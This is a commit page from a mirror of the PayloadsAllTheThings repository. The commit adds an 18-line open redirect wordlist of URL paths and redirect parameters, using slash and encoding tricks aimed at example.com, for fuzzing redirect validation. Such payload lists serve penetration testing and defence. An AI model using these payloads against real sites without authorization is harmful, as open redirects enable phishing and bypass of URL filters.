mirror of
https://github.com/weyne85/PayloadsAllTheThings.git
synced 2025-10-29 16:57:02 +00:00
File inclusion - more intruders
This commit is contained in:
18
Open redirect/open_redirect_wordlist.txt
Normal file
18
Open redirect/open_redirect_wordlist.txt
Normal file
@@ -0,0 +1,18 @@
|
||||
/http://example.com
|
||||
/%5cexample.com
|
||||
/%2f%2fexample.com
|
||||
/example.com/%2f%2e%2e
|
||||
/http:/example.com
|
||||
/?url=http://example.com&next=http://example.com&redirect=http://example.com&redir=http://example.com&rurl=http://example.com
|
||||
/?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com
|
||||
/?url=/\/example.com&next=/\/example.com&redirect=/\/example.com
|
||||
/redirect?url=http://example.com&next=http://example.com&redirect=http://example.com&redir=http://example.com&rurl=http://example.com
|
||||
/redirect?url=//example.com&next=//example.com&redirect=//example.com&redir=//example.com&rurl=//example.com
|
||||
/redirect?url=/\/example.com&next=/\/example.com&redirect=/\/example.com&redir=/\/example.com&rurl=/\/example.com
|
||||
/.example.com
|
||||
///\;@example.com
|
||||
///example.com/
|
||||
///example.com
|
||||
///example.com/%2f..
|
||||
/////example.com/
|
||||
/////example.com
|
||||
Reference in New Issue
Block a user